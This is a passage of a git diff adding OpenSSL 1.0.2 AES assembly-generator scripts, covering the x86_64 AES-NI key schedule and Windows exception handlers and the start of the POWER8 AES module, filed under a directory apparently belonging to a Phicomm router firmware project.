+	movaps	0x10(%rsp),%xmm6
+	movaps	0x20(%rsp),%xmm7
+	movaps	0x30(%rsp),%xmm8
+	movaps	0x40(%rsp),%xmm9
+	movaps	0x50(%rsp),%xmm10
+	movaps	0x60(%rsp),%xmm11
+	movaps	0x70(%rsp),%xmm12
+	movaps	0x80(%rsp),%xmm13
+	movaps	0x90(%rsp),%xmm14
+	movaps	0xa0(%rsp),%xmm15
+___
+$code.=<<___;
+	lea	(%rbp),%rsp
+	pop	%rbp
+.Lcbc_ret:
+	ret
+.size	${PREFIX}_cbc_encrypt,.-${PREFIX}_cbc_encrypt
+___
+} 
+# int $PREFIX_set_[en|de]crypt_key (const unsigned char *userKey,
+#				int bits, AES_KEY *key)
+{ my ($inp,$bits,$key) = @_4args;
+  $bits =~ s/%r/%e/;
+
+$code.=<<___;
+.globl	${PREFIX}_set_decrypt_key
+.type	${PREFIX}_set_decrypt_key,\@abi-omnipotent
+.align	16
+${PREFIX}_set_decrypt_key:
+	.byte	0x48,0x83,0xEC,0x08	# sub rsp,8
+	call	__aesni_set_encrypt_key
+	shl	\$4,$bits		# rounds-1 after _aesni_set_encrypt_key
+	test	%eax,%eax
+	jnz	.Ldec_key_ret
+	lea	16($key,$bits),$inp	# points at the end of key schedule
+
+	$movkey	($key),%xmm0		# just swap
+	$movkey	($inp),%xmm1
+	$movkey	%xmm0,($inp)
+	$movkey	%xmm1,($key)
+	lea	16($key),$key
+	lea	-16($inp),$inp
+
+.Ldec_key_inverse:
+	$movkey	($key),%xmm0		# swap and inverse
+	$movkey	($inp),%xmm1
+	aesimc	%xmm0,%xmm0
+	aesimc	%xmm1,%xmm1
+	lea	16($key),$key
+	lea	-16($inp),$inp
+	$movkey	%xmm0,16($inp)
+	$movkey	%xmm1,-16($key)
+	cmp	$key,$inp
+	ja	.Ldec_key_inverse
+
+	$movkey	($key),%xmm0		# inverse middle
+	aesimc	%xmm0,%xmm0
+	$movkey	%xmm0,($inp)
+.Ldec_key_ret:
+	add	\$8,%rsp
+	ret
+.LSEH_end_set_decrypt_key:
+.size	${PREFIX}_set_decrypt_key,.-${PREFIX}_set_decrypt_key
+___
+
+# This is based on submission by
+#
+#	Huang Ying <ying.huang@intel.com>
+#	Vinodh Gopal <vinodh.gopal@intel.com>
+#	Kahraman Akdemir
+#
+# Agressively optimized in respect to aeskeygenassist's critical path
+# and is contained in %xmm0-5 to meet Win64 ABI requirement.
+#
+$code.=<<___;
+.globl	${PREFIX}_set_encrypt_key
+.type	${PREFIX}_set_encrypt_key,\@abi-omnipotent
+.align	16
+${PREFIX}_set_encrypt_key:
+__aesni_set_encrypt_key:
+	.byte	0x48,0x83,0xEC,0x08	# sub rsp,8
+	mov	\$-1,%rax
+	test	$inp,$inp
+	jz	.Lenc_key_ret
+	test	$key,$key
+	jz	.Lenc_key_ret
+
+	movups	($inp),%xmm0		# pull first 128 bits of *userKey
+	xorps	%xmm4,%xmm4		# low dword of xmm4 is assumed 0
+	lea	16($key),%rax
+	cmp	\$256,$bits
+	je	.L14rounds
+	cmp	\$192,$bits
+	je	.L12rounds
+	cmp	\$128,$bits
+	jne	.Lbad_keybits
+
+.L10rounds:
+	mov	\$9,$bits			# 10 rounds for 128-bit key
+	$movkey	%xmm0,($key)			# round 0
+	aeskeygenassist	\$0x1,%xmm0,%xmm1	# round 1
+	call		.Lkey_expansion_128_cold
+	aeskeygenassist	\$0x2,%xmm0,%xmm1	# round 2
+	call		.Lkey_expansion_128
+	aeskeygenassist	\$0x4,%xmm0,%xmm1	# round 3
+	call		.Lkey_expansion_128
+	aeskeygenassist	\$0x8,%xmm0,%xmm1	# round 4
+	call		.Lkey_expansion_128
+	aeskeygenassist	\$0x10,%xmm0,%xmm1	# round 5
+	call		.Lkey_expansion_128
+	aeskeygenassist	\$0x20,%xmm0,%xmm1	# round 6
+	call		.Lkey_expansion_128
+	aeskeygenassist	\$0x40,%xmm0,%xmm1	# round 7
+	call		.Lkey_expansion_128
+	aeskeygenassist	\$0x80,%xmm0,%xmm1	# round 8
+	call		.Lkey_expansion_128
+	aeskeygenassist	\$0x1b,%xmm0,%xmm1	# round 9
+	call		.Lkey_expansion_128
+	aeskeygenassist	\$0x36,%xmm0,%xmm1	# round 10
+	call		.Lkey_expansion_128
+	$movkey	%xmm0,(%rax)
+	mov	$bits,80(%rax)	# 240(%rdx)
+	xor	%eax,%eax
+	jmp	.Lenc_key_ret
+
+.align	16
+.L12rounds:
+	movq	16($inp),%xmm2			# remaining 1/3 of *userKey
+	mov	\$11,$bits			# 12 rounds for 192
+	$movkey	%xmm0,($key)			# round 0
+	aeskeygenassist	\$0x1,%xmm2,%xmm1	# round 1,2
+	call		.Lkey_expansion_192a_cold
+	aeskeygenassist	\$0x2,%xmm2,%xmm1	# round 2,3
+	call		.Lkey_expansion_192b
+	aeskeygenassist	\$0x4,%xmm2,%xmm1	# round 4,5
+	call		.Lkey_expansion_192a
+	aeskeygenassist	\$0x8,%xmm2,%xmm1	# round 5,6
+	call		.Lkey_expansion_192b
+	aeskeygenassist	\$0x10,%xmm2,%xmm1	# round 7,8
+	call		.Lkey_expansion_192a
+	aeskeygenassist	\$0x20,%xmm2,%xmm1	# round 8,9
+	call		.Lkey_expansion_192b
+	aeskeygenassist	\$0x40,%xmm2,%xmm1	# round 10,11
+	call		.Lkey_expansion_192a
+	aeskeygenassist	\$0x80,%xmm2,%xmm1	# round 11,12
+	call		.Lkey_expansion_192b
+	$movkey	%xmm0,(%rax)
+	mov	$bits,48(%rax)	# 240(%rdx)
+	xor	%rax, %rax
+	jmp	.Lenc_key_ret
+
+.align	16
+.L14rounds:
+	movups	16($inp),%xmm2			# remaning half of *userKey
+	mov	\$13,$bits			# 14 rounds for 256
+	lea	16(%rax),%rax
+	$movkey	%xmm0,($key)			# round 0
+	$movkey	%xmm2,16($key)			# round 1
+	aeskeygenassist	\$0x1,%xmm2,%xmm1	# round 2
+	call		.Lkey_expansion_256a_cold
+	aeskeygenassist	\$0x1,%xmm0,%xmm1	# round 3
+	call		.Lkey_expansion_256b
+	aeskeygenassist	\$0x2,%xmm2,%xmm1	# round 4
+	call		.Lkey_expansion_256a
+	aeskeygenassist	\$0x2,%xmm0,%xmm1	# round 5
+	call		.Lkey_expansion_256b
+	aeskeygenassist	\$0x4,%xmm2,%xmm1	# round 6
+	call		.Lkey_expansion_256a
+	aeskeygenassist	\$0x4,%xmm0,%xmm1	# round 7
+	call		.Lkey_expansion_256b
+	aeskeygenassist	\$0x8,%xmm2,%xmm1	# round 8
+	call		.Lkey_expansion_256a
+	aeskeygenassist	\$0x8,%xmm0,%xmm1	# round 9
+	call		.Lkey_expansion_256b
+	aeskeygenassist	\$0x10,%xmm2,%xmm1	# round 10
+	call		.Lkey_expansion_256a
+	aeskeygenassist	\$0x10,%xmm0,%xmm1	# round 11
+	call		.Lkey_expansion_256b
+	aeskeygenassist	\$0x20,%xmm2,%xmm1	# round 12
+	call		.Lkey_expansion_256a
+	aeskeygenassist	\$0x20,%xmm0,%xmm1	# round 13
+	call		.Lkey_expansion_256b
+	aeskeygenassist	\$0x40,%xmm2,%xmm1	# round 14
+	call		.Lkey_expansion_256a
+	$movkey	%xmm0,(%rax)
+	mov	$bits,16(%rax)	# 240(%rdx)
+	xor	%rax,%rax
+	jmp	.Lenc_key_ret
+
+.align	16
+.Lbad_keybits:
+	mov	\$-2,%rax
+.Lenc_key_ret:
+	add	\$8,%rsp
+	ret
+.LSEH_end_set_encrypt_key:
+
+.align	16
+.Lkey_expansion_128:
+	$movkey	%xmm0,(%rax)
+	lea	16(%rax),%rax
+.Lkey_expansion_128_cold:
+	shufps	\$0b00010000,%xmm0,%xmm4
+	xorps	%xmm4, %xmm0
+	shufps	\$0b10001100,%xmm0,%xmm4
+	xorps	%xmm4, %xmm0
+	shufps	\$0b11111111,%xmm1,%xmm1	# critical path
+	xorps	%xmm1,%xmm0
+	ret
+
+.align 16
+.Lkey_expansion_192a:
+	$movkey	%xmm0,(%rax)
+	lea	16(%rax),%rax
+.Lkey_expansion_192a_cold:
+	movaps	%xmm2, %xmm5
+.Lkey_expansion_192b_warm:
+	shufps	\$0b00010000,%xmm0,%xmm4
+	movdqa	%xmm2,%xmm3
+	xorps	%xmm4,%xmm0
+	shufps	\$0b10001100,%xmm0,%xmm4
+	pslldq	\$4,%xmm3
+	xorps	%xmm4,%xmm0
+	pshufd	\$0b01010101,%xmm1,%xmm1	# critical path
+	pxor	%xmm3,%xmm2
+	pxor	%xmm1,%xmm0
+	pshufd	\$0b11111111,%xmm0,%xmm3
+	pxor	%xmm3,%xmm2
+	ret
+
+.align 16
+.Lkey_expansion_192b:
+	movaps	%xmm0,%xmm3
+	shufps	\$0b01000100,%xmm0,%xmm5
+	$movkey	%xmm5,(%rax)
+	shufps	\$0b01001110,%xmm2,%xmm3
+	$movkey	%xmm3,16(%rax)
+	lea	32(%rax),%rax
+	jmp	.Lkey_expansion_192b_warm
+
+.align	16
+.Lkey_expansion_256a:
+	$movkey	%xmm2,(%rax)
+	lea	16(%rax),%rax
+.Lkey_expansion_256a_cold:
+	shufps	\$0b00010000,%xmm0,%xmm4
+	xorps	%xmm4,%xmm0
+	shufps	\$0b10001100,%xmm0,%xmm4
+	xorps	%xmm4,%xmm0
+	shufps	\$0b11111111,%xmm1,%xmm1	# critical path
+	xorps	%xmm1,%xmm0
+	ret
+
+.align 16
+.Lkey_expansion_256b:
+	$movkey	%xmm0,(%rax)
+	lea	16(%rax),%rax
+
+	shufps	\$0b00010000,%xmm2,%xmm4
+	xorps	%xmm4,%xmm2
+	shufps	\$0b10001100,%xmm2,%xmm4
+	xorps	%xmm4,%xmm2
+	shufps	\$0b10101010,%xmm1,%xmm1	# critical path
+	xorps	%xmm1,%xmm2
+	ret
+.size	${PREFIX}_set_encrypt_key,.-${PREFIX}_set_encrypt_key
+.size	__aesni_set_encrypt_key,.-__aesni_set_encrypt_key
+___
+}
+
+$code.=<<___;
+.align	64
+.Lbswap_mask:
+	.byte	15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,0
+.Lincrement32:
+	.long	6,6,6,0
+.Lincrement64:
+	.long	1,0,0,0
+.Lxts_magic:
+	.long	0x87,0,1,0
+.Lincrement1:
+	.byte	0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1
+
+.asciz  "AES for Intel AES-NI, CRYPTOGAMS by <appro\@openssl.org>"
+.align	64
+___
+
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+if ($win64) {
+$rec="%rcx";
+$frame="%rdx";
+$context="%r8";
+$disp="%r9";
+
+$code.=<<___;
+.extern	__imp_RtlVirtualUnwind
+___
+$code.=<<___ if ($PREFIX eq "aesni");
+.type	ecb_ccm64_se_handler,\@abi-omnipotent
+.align	16
+ecb_ccm64_se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HandlerData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# prologue label
+	cmp	%r10,%rbx		# context->Rip<prologue label
+	jb	.Lcommon_seh_tail
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=epilogue label
+	jae	.Lcommon_seh_tail
+
+	lea	0(%rax),%rsi		# %xmm save area
+	lea	512($context),%rdi	# &context.Xmm6
+	mov	\$8,%ecx		# 4*sizeof(%xmm0)/sizeof(%rax)
+	.long	0xa548f3fc		# cld; rep movsq
+	lea	0x58(%rax),%rax		# adjust stack pointer
+
+	jmp	.Lcommon_seh_tail
+.size	ecb_ccm64_se_handler,.-ecb_ccm64_se_handler
+
+.type	ctr_xts_se_handler,\@abi-omnipotent
+.align	16
+ctr_xts_se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HandlerData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# prologue lable
+	cmp	%r10,%rbx		# context->Rip<prologue label
+	jb	.Lcommon_seh_tail
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=epilogue label
+	jae	.Lcommon_seh_tail
+
+	mov	160($context),%rax	# pull context->Rbp
+	lea	-0xa0(%rax),%rsi	# %xmm save area
+	lea	512($context),%rdi	# & context.Xmm6
+	mov	\$20,%ecx		# 10*sizeof(%xmm0)/sizeof(%rax)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	jmp	.Lcommon_rbp_tail
+.size	ctr_xts_se_handler,.-ctr_xts_se_handler
+___
+$code.=<<___;
+.type	cbc_se_handler,\@abi-omnipotent
+.align	16
+cbc_se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	152($context),%rax	# pull context->Rsp
+	mov	248($context),%rbx	# pull context->Rip
+
+	lea	.Lcbc_decrypt(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<"prologue" label
+	jb	.Lcommon_seh_tail
+
+	lea	.Lcbc_decrypt_body(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<cbc_decrypt_body
+	jb	.Lrestore_cbc_rax
+
+	lea	.Lcbc_ret(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip>="epilogue" label
+	jae	.Lcommon_seh_tail
+
+	lea	16(%rax),%rsi		# %xmm save area
+	lea	512($context),%rdi	# &context.Xmm6
+	mov	\$20,%ecx		# 10*sizeof(%xmm0)/sizeof(%rax)
+	.long	0xa548f3fc		# cld; rep movsq
+
+.Lcommon_rbp_tail:
+	mov	160($context),%rax	# pull context->Rbp
+	mov	(%rax),%rbp		# restore saved %rbp
+	lea	8(%rax),%rax		# adjust stack pointer
+	mov	%rbp,160($context)	# restore context->Rbp
+	jmp	.Lcommon_seh_tail
+
+.Lrestore_cbc_rax:
+	mov	120($context),%rax
+
+.Lcommon_seh_tail:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$154,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	cbc_se_handler,.-cbc_se_handler
+
+.section	.pdata
+.align	4
+___
+$code.=<<___ if ($PREFIX eq "aesni");
+	.rva	.LSEH_begin_aesni_ecb_encrypt
+	.rva	.LSEH_end_aesni_ecb_encrypt
+	.rva	.LSEH_info_ecb
+
+	.rva	.LSEH_begin_aesni_ccm64_encrypt_blocks
+	.rva	.LSEH_end_aesni_ccm64_encrypt_blocks
+	.rva	.LSEH_info_ccm64_enc
+
+	.rva	.LSEH_begin_aesni_ccm64_decrypt_blocks
+	.rva	.LSEH_end_aesni_ccm64_decrypt_blocks
+	.rva	.LSEH_info_ccm64_dec
+
+	.rva	.LSEH_begin_aesni_ctr32_encrypt_blocks
+	.rva	.LSEH_end_aesni_ctr32_encrypt_blocks
+	.rva	.LSEH_info_ctr32
+
+	.rva	.LSEH_begin_aesni_xts_encrypt
+	.rva	.LSEH_end_aesni_xts_encrypt
+	.rva	.LSEH_info_xts_enc
+
+	.rva	.LSEH_begin_aesni_xts_decrypt
+	.rva	.LSEH_end_aesni_xts_decrypt
+	.rva	.LSEH_info_xts_dec
+___
+$code.=<<___;
+	.rva	.LSEH_begin_${PREFIX}_cbc_encrypt
+	.rva	.LSEH_end_${PREFIX}_cbc_encrypt
+	.rva	.LSEH_info_cbc
+
+	.rva	${PREFIX}_set_decrypt_key
+	.rva	.LSEH_end_set_decrypt_key
+	.rva	.LSEH_info_key
+
+	.rva	${PREFIX}_set_encrypt_key
+	.rva	.LSEH_end_set_encrypt_key
+	.rva	.LSEH_info_key
+.section	.xdata
+.align	8
+___
+$code.=<<___ if ($PREFIX eq "aesni");
+.LSEH_info_ecb:
+	.byte	9,0,0,0
+	.rva	ecb_ccm64_se_handler
+	.rva	.Lecb_enc_body,.Lecb_enc_ret		# HandlerData[]
+.LSEH_info_ccm64_enc:
+	.byte	9,0,0,0
+	.rva	ecb_ccm64_se_handler
+	.rva	.Lccm64_enc_body,.Lccm64_enc_ret	# HandlerData[]
+.LSEH_info_ccm64_dec:
+	.byte	9,0,0,0
+	.rva	ecb_ccm64_se_handler
+	.rva	.Lccm64_dec_body,.Lccm64_dec_ret	# HandlerData[]
+.LSEH_info_ctr32:
+	.byte	9,0,0,0
+	.rva	ctr_xts_se_handler
+	.rva	.Lctr32_body,.Lctr32_epilogue		# HandlerData[]
+.LSEH_info_xts_enc:
+	.byte	9,0,0,0
+	.rva	ctr_xts_se_handler
+	.rva	.Lxts_enc_body,.Lxts_enc_epilogue	# HandlerData[]
+.LSEH_info_xts_dec:
+	.byte	9,0,0,0
+	.rva	ctr_xts_se_handler
+	.rva	.Lxts_dec_body,.Lxts_dec_epilogue	# HandlerData[]
+___
+$code.=<<___;
+.LSEH_info_cbc:
+	.byte	9,0,0,0
+	.rva	cbc_se_handler
+.LSEH_info_key:
+	.byte	0x01,0x04,0x01,0x00
+	.byte	0x04,0x02,0x00,0x00	# sub rsp,8
+___
+}
+
+sub rex {
+  local *opcode=shift;
+  my ($dst,$src)=@_;
+  my $rex=0;
+
+    $rex|=0x04			if($dst>=8);
+    $rex|=0x01			if($src>=8);
+    push @opcode,$rex|0x40	if($rex);
+}
+
+sub aesni {
+  my $line=shift;
+  my @opcode=(0x66);
+
+    if ($line=~/(aeskeygenassist)\s+\$([x0-9a-f]+),\s*%xmm([0-9]+),\s*%xmm([0-9]+)/) {
+	rex(\@opcode,$4,$3);
+	push @opcode,0x0f,0x3a,0xdf;
+	push @opcode,0xc0|($3&7)|(($4&7)<<3);	# ModR/M
+	my $c=$2;
+	push @opcode,$c=~/^0/?oct($c):$c;
+	return ".byte\t".join(',',@opcode);
+    }
+    elsif ($line=~/(aes[a-z]+)\s+%xmm([0-9]+),\s*%xmm([0-9]+)/) {
+	my %opcodelet = (
+		"aesimc" => 0xdb,
+		"aesenc" => 0xdc,	"aesenclast" => 0xdd,
+		"aesdec" => 0xde,	"aesdeclast" => 0xdf
+	);
+	return undef if (!defined($opcodelet{$1}));
+	rex(\@opcode,$3,$2);
+	push @opcode,0x0f,0x38,$opcodelet{$1};
+	push @opcode,0xc0|($2&7)|(($3&7)<<3);	# ModR/M
+	return ".byte\t".join(',',@opcode);
+    }
+    elsif ($line=~/(aes[a-z]+)\s+([0x1-9a-fA-F]*)\(%rsp\),\s*%xmm([0-9]+)/) {
+	my %opcodelet = (
+		"aesenc" => 0xdc,	"aesenclast" => 0xdd,
+		"aesdec" => 0xde,	"aesdeclast" => 0xdf
+	);
+	return undef if (!defined($opcodelet{$1}));
+	my $off = $2;
+	push @opcode,0x44 if ($3>=8);
+	push @opcode,0x0f,0x38,$opcodelet{$1};
+	push @opcode,0x44|(($3&7)<<3),0x24;	# ModR/M
+	push @opcode,($off=~/^0/?oct($off):$off)&0xff;
+	return ".byte\t".join(',',@opcode);
+    }
+    return $line;
+}
+
+sub movbe {
+	".byte	0x0f,0x38,0xf1,0x44,0x24,".shift;
+}
+
+$code =~ s/\`([^\`]*)\`/eval($1)/gem;
+$code =~ s/\b(aes.*%xmm[0-9]+).*$/aesni($1)/gem;
+#$code =~ s/\bmovbe\s+%eax/bswap %eax; mov %eax/gm;	# debugging artefact
+$code =~ s/\bmovbe\s+%eax,\s*([0-9]+)\(%rsp\)/movbe($1)/gem;
+
+print $code;
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesp8-ppc.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesp8-ppc.pl
new file mode 100755
index 0000000..a1891cc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesp8-ppc.pl
@@ -0,0 +1,1942 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# This module implements support for AES instructions as per PowerISA
+# specification version 2.07, first implemented by POWER8 processor.
+# The module is endian-agnostic in sense that it supports both big-
+# and little-endian cases. Data alignment in parallelizable modes is
+# handled with VSX loads and stores, which implies MSR.VSX flag being
+# set. It should also be noted that ISA specification doesn't prohibit
+# alignment exceptions for these instructions on page boundaries.
+# Initially alignment was handled in pure AltiVec/VMX way [when data
+# is aligned programmatically, which in turn guarantees exception-
+# free execution], but it turned to hamper performance when vcipher
+# instructions are interleaved. It's reckoned that eventual
+# misalignment penalties at page boundaries are in average lower
+# than additional overhead in pure AltiVec approach.
+
+$flavour = shift;
+
+if ($flavour =~ /64/) {
+	$SIZE_T	=8;
+	$LRSAVE	=2*$SIZE_T;
+	$STU	="stdu";
+	$POP	="ld";
+	$PUSH	="std";
+	$UCMP	="cmpld";
+	$SHL	="sldi";
+} elsif ($flavour =~ /32/) {
+	$SIZE_T	=4;
+	$LRSAVE	=$SIZE_T;
+	$STU	="stwu";
+	$POP	="lwz";
+	$PUSH	="stw";
+	$UCMP	="cmplw";
+	$SHL	="slwi";
+} else { die "nonsense $flavour"; }
+
+$LITTLE_ENDIAN = ($flavour=~/le$/) ? $SIZE_T : 0;
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}ppc-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/ppc-xlate.pl" and -f $xlate) or
+die "can't locate ppc-xlate.pl";
+
+open STDOUT,"| $^X $xlate $flavour ".shift || die "can't call $xlate: $!";
+
+$FRAME=8*$SIZE_T;
+$prefix="aes_p8";
+
+$sp="r1";
+$vrsave="r12";
+
+#########################################################################
+{{{	# Key setup procedures						#
+my ($inp,$bits,$out,$ptr,$cnt,$rounds)=map("r$_",(3..8));
+my ($zero,$in0,$in1,$key,$rcon,$mask,$tmp)=map("v$_",(0..6));
+my ($stage,$outperm,$outmask,$outhead,$outtail)=map("v$_",(7..11));
+
+$code.=<<___;
+.machine	"any"
+
+.text
+
+.align	7
+rcon:
+.long	0x01000000, 0x01000000, 0x01000000, 0x01000000	?rev
+.long	0x1b000000, 0x1b000000, 0x1b000000, 0x1b000000	?rev
+.long	0x0d0e0f0c, 0x0d0e0f0c, 0x0d0e0f0c, 0x0d0e0f0c	?rev
+.long	0,0,0,0						?asis
+Lconsts:
+	mflr	r0
+	bcl	20,31,\$+4
+	mflr	$ptr	 #vvvvv "distance between . and rcon
+	addi	$ptr,$ptr,-0x48
+	mtlr	r0
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+.asciz	"AES for PowerISA 2.07, CRYPTOGAMS by <appro\@openssl.org>"
+
+.globl	.${prefix}_set_encrypt_key
+.align	5
+.${prefix}_set_encrypt_key:
+Lset_encrypt_key:
+	mflr		r11
+	$PUSH		r11,$LRSAVE($sp)
+
+	li		$ptr,-1
+	${UCMP}i	$inp,0
+	beq-		Lenc_key_abort		# if ($inp==0) return -1;
+	${UCMP}i	$out,0
+	beq-		Lenc_key_abort		# if ($out==0) return -1;
+	li		$ptr,-2
+	cmpwi		$bits,128
+	blt-		Lenc_key_abort
+	cmpwi		$bits,256
+	bgt-		Lenc_key_abort
+	andi.		r0,$bits,0x3f
+	bne-		Lenc_key_abort
+
+	lis		r0,0xfff0
+	mfspr		$vrsave,256
+	mtspr		256,r0
+
+	bl		Lconsts
+	mtlr		r11
+
+	neg		r9,$inp
+	lvx		$in0,0,$inp
+	addi		$inp,$inp,15		# 15 is not typo
+	lvsr		$key,0,r9		# borrow $key
+	li		r8,0x20
+	cmpwi		$bits,192
+	lvx		$in1,0,$inp
+	le?vspltisb	$mask,0x0f		# borrow $mask
+	lvx		$rcon,0,$ptr
+	le?vxor		$key,$key,$mask		# adjust for byte swap
+	lvx		$mask,r8,$ptr
+	addi		$ptr,$ptr,0x10
+	vperm		$in0,$in0,$in1,$key	# align [and byte swap in LE]
+	li		$cnt,8
+	vxor		$zero,$zero,$zero
+	mtctr		$cnt
+
+	?lvsr		$outperm,0,$out
+	vspltisb	$outmask,-1
+	lvx		$outhead,0,$out
+	?vperm		$outmask,$zero,$outmask,$outperm
+
+	blt		Loop128
+	addi		$inp,$inp,8
+	beq		L192
+	addi		$inp,$inp,8
+	b		L256
+
+.align	4
+Loop128:
+	vperm		$key,$in0,$in0,$mask	# rotate-n-splat
+	vsldoi		$tmp,$zero,$in0,12	# >>32
+	 vperm		$outtail,$in0,$in0,$outperm	# rotate
+	 vsel		$stage,$outhead,$outtail,$outmask
+	 vmr		$outhead,$outtail
+	vcipherlast	$key,$key,$rcon
+	 stvx		$stage,0,$out
+	 addi		$out,$out,16
+
+	vxor		$in0,$in0,$tmp
+	vsldoi		$tmp,$zero,$tmp,12	# >>32
+	vxor		$in0,$in0,$tmp
+	vsldoi		$tmp,$zero,$tmp,12	# >>32
+	vxor		$in0,$in0,$tmp
+	 vadduwm	$rcon,$rcon,$rcon
+	vxor		$in0,$in0,$key
+	bdnz		Loop128
+
+	lvx		$rcon,0,$ptr		# last two round keys
+
+	vperm		$key,$in0,$in0,$mask	# rotate-n-splat
+	vsldoi		$tmp,$zero,$in0,12	# >>32
+	 vperm		$outtail,$in0,$in0,$outperm	# rotate
+	 vsel		$stage,$outhead,$outtail,$outmask
+	 vmr		$outhead,$outtail
+	vcipherlast	$key,$key,$rcon
+	 stvx		$stage,0,$out
+	 addi		$out,$out,16
+
+	vxor		$in0,$in0,$tmp
+	vsldoi		$tmp,$zero,$tmp,12	# >>32
+	vxor		$in0,$in0,$tmp
+	vsldoi		$tmp,$zero,$tmp,12	# >>32
+	vxor		$in0,$in0,$tmp
+	 vadduwm	$rcon,$rcon,$rcon
+	vxor		$in0,$in0,$key
+
+	vperm		$key,$in0,$in0,$mask	# rotate-n-splat
+	vsldoi		$tmp,$zero,$in0,12	# >>32
+	 vperm		$outtail,$in0,$in0,$outperm	# rotate
+	 vsel		$stage,$outhead,$outtail,$outmask
+	 vmr		$outhead,$outtail
+	vcipherlast	$key,$key,$rcon
+	 stvx		$stage,0,$out
+	 addi		$out,$out,16
+
+	vxor		$in0,$in0,$tmp
+	vsldoi		$tmp,$zero,$tmp,12	# >>32
+	vxor		$in0,$in0,$tmp
+	vsldoi		$tmp,$zero,$tmp,12	# >>32
+	vxor		$in0,$in0,$tmp
+	vxor		$in0,$in0,$key
+	 vperm		$outtail,$in0,$in0,$outperm	# rotate
+	 vsel		$stage,$outhead,$outtail,$outmask
+	 vmr		$outhead,$outtail
+	 stvx		$stage,0,$out
+
+	addi		$inp,$out,15		# 15 is not typo
+	addi		$out,$out,0x50
+
+	li		$rounds,10
+	b		Ldone
+
+.align	4
+L192:
+	lvx		$tmp,0,$inp
+	li		$cnt,4
+	 vperm		$outtail,$in0,$in0,$outperm	# rotate
+	 vsel		$stage,$outhead,$outtail,$outmask
+	 vmr		$outhead,$outtail
+	 stvx		$stage,0,$out
+	 addi		$out,$out,16
+	vperm		$in1,$in1,$tmp,$key	# align [and byte swap in LE]
+	vspltisb	$key,8			# borrow $key
+	mtctr		$cnt
+	vsububm		$mask,$mask,$key	# adjust the mask
+
+Loop192:
+	vperm		$key,$in1,$in1,$mask	# roate-n-splat
+	vsldoi		$tmp,$zero,$in0,12	# >>32
+	vcipherlast	$key,$key,$rcon
+
+	vxor		$in0,$in0,$tmp
+	vsldoi		$tmp,$zero,$tmp,12	# >>32
+	vxor		$in0,$in0,$tmp
+	vsldoi		$tmp,$zero,$tmp,12	# >>32
+	vxor		$in0,$in0,$tmp
+
